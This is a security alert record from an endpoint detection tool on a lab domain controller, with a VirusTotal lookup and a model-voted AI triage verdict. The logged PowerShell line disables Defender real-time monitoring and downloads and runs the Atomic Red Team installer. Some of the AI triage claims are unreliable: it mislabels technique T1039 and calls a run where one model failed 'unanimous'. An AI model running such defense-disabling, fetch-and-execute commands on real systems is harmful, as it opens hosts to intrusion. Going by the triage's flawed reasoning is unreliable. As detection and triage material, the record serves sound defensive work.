{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Tampering",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1039 -CheckPrereqs ; Invoke-AtomicTest T1039 -GetPrereqs ; Invoke-AtomicTest T1039 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 249815040,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld9B56.tmp.bat T1039 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4575232,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 8460,
        "THIS_ATOM": "c896e11e93fdfcc580e177e469c2a841",
        "THREADS": 3,
        "TIMESTAMP": 1774364737221,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 8460,
      "PROCESS_ID": 9156,
      "THREADS": 30,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "942080e1-239e-4ded-8513-ffb1c5bcc3a2",
      "event_time": 1774364737793,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3799,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "c896e11e93fdfcc580e177e469c2a841",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "20e47fdec03e5cfc9f50dea369c2a844"
    }
  },
  "detect_id": "23905730-9898-4d94-be3f-9cdf69c2a845",
  "gen_time": 1774364741594,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364737\u0026selected=20e47fdec03e5cfc9f50dea369c2a844",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "942080e1-239e-4ded-8513-ffb1c5bcc3a2",
    "event_time": 1774364737793,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3799,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "c896e11e93fdfcc580e177e469c2a841",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "20e47fdec03e5cfc9f50dea369c2a844"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364741000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.9,
  "false_positive_reason": null,
  "investigation_questions": [
    "What other processes were spawned by PID 8460 (cmd.exe) that executed the ART framework?",
    "Were there any network connections established during this execution window?",
    "Is there evidence of persistence mechanisms installed alongside the ART deployment?",
    "Has this host been part of a previous lateral movement campaign?"
  ],
  "ioc_analysis": "The PowerShell process is located in the expected System32 directory and is Microsoft-signed (HASH matches official binaries), which creates a false positive scenario for location-based detection. However, the command line arguments are highly suspicious: they disable real-time monitoring, bypass security protocols, download code from an external source (redcanaryco/invoke-atomicredteam), and explicitly invoke T1039 (Execution of Program) techniques. The presence of \u0027IEX\u0027 (Invoke-Expression) with a remote URL is a definitive indicator of malicious intent.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
    "Set-MpPreference -DisableRealtimeMonitoring $true",
    "IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)",
    "Invoke-AtomicTest T1039"
  ],
  "mitre_techniques": [
    "T1059",
    "T1078",
    "T1039",
    "T1567.001"
  ],
  "recommended_actions": [
    "ESCALATE to Incident Response (unanimous AI verdict)",
    "Isolate affected sensor immediately",
    "Isolate the host immediately to prevent lateral movement",
    "Block outbound traffic to raw.githubusercontent.com at the network perimeter",
    "Review all SYSTEM-level PowerShell processes for similar command line patterns",
    "Check Event Logs for additional T1039 execution attempts or file modifications",
    "Preserve memory dump and process tree for forensic analysis"
  ],
  "risk_score": 90,
  "severity": "critical",
  "summary": "**Vote: UNANIMOUS (2/2 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious execution of the Atomic Red Team (ART) framework under SYSTEM privileges, bypassing real-time monitoring and executing T1039 techniques. The process is signed but its command line contains explicit indicators of compromise including disabling security protocols and downloading scripts from an external GitHub repository.\n\n**IOC Analysis:** The PowerShell process is located in the expected System32 directory and is Microsoft-signed (HASH matches official binaries), which creates a false positive scenario for location-based detection. However, the command line arguments are highly suspicious: they disable real-time monitoring, bypass security protocols, download code from an external source (redcanaryco/invoke-atomicredteam), and explicitly invoke T1039 (Execution of Program) techniques. The presence of \u0027IEX\u0027 (Invoke-Expression) with a remote URL is a definitive indicator of malicious intent.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.85\nA legitimate PowerShell process from C:\\Windows\\System32 is executing a command to disable real-time monitoring and install potentially malicious tools, indicating a high-risk attempt to evade security measures.\n\n**IOC Analysis:** The FILE_PATH is a known Windows system binary located in C:\\Windows\\System32, and the HASH matches a Microsoft-signed PowerShell binary, making it benign based on IOC validation. However, the malicious command line directly disables real-time monitoring and installs tools from external sources, confirming the activity as malicious despite the legitimate process.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "escalate_ir",
    "mode": "unanimous",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: true_positive (high, 85% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.85,
        "model": "deepseek-r1:8b",
        "verdict": "true_positive"
      }
    ],
    "winning_count": 2,
    "winning_verdict": "true_positive"
  }
}